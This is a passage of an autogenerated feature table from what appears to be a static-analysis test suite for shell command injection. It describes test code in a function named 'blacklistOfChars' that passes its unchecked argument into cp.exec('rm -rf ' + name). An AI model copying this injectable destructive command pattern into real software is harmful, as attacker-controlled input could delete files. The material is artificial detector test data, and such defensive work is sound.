name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:3 | cp | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:3 | cp | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:8 | cp.exec | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | cp.exec ... + name) | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:5:197:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:5:197:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:5:197:8 | exec | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:5:197:8 | exec | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:5:197:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:18 | "rm -rf " | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:10:197:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:22:197:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:22:197:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:22:197:25 | name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:22:197:25 | name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:22:197:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:22:197:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:25 | /[^A-Za-z0-9_\\/:=-]/ | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:25 | /[^A-Za-z0-9_\\/:=-]/ | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:25 | /[^A-Za-z0-9_\\/:=-]/ | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:25 | /[^A-Za-z0-9_\\/:=-]/ | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:25 | /[^A-Za-z0-9_\\/:=-]/ | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:30 | /[^A-Za ... ]/.test | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:30 | /[^A-Za ... ]/.test | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:30 | /[^A-Za ... ]/.test | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:30 | /[^A-Za ... ]/.test | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:30 | /[^A-Za ... ]/.test | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | /[^A-Za ... t(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | /[^A-Za ... t(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | /[^A-Za ... t(name) | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | /[^A-Za ... t(name) | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | /[^A-Za ... t(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | exceptional return of /[^A-Za ... t(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | exceptional return of /[^A-Za ... t(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | exceptional return of /[^A-Za ... t(name) | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | exceptional return of /[^A-Za ... t(name) | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | exceptional return of /[^A-Za ... t(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:27:199:30 | test | contextFunctionInterfaces | 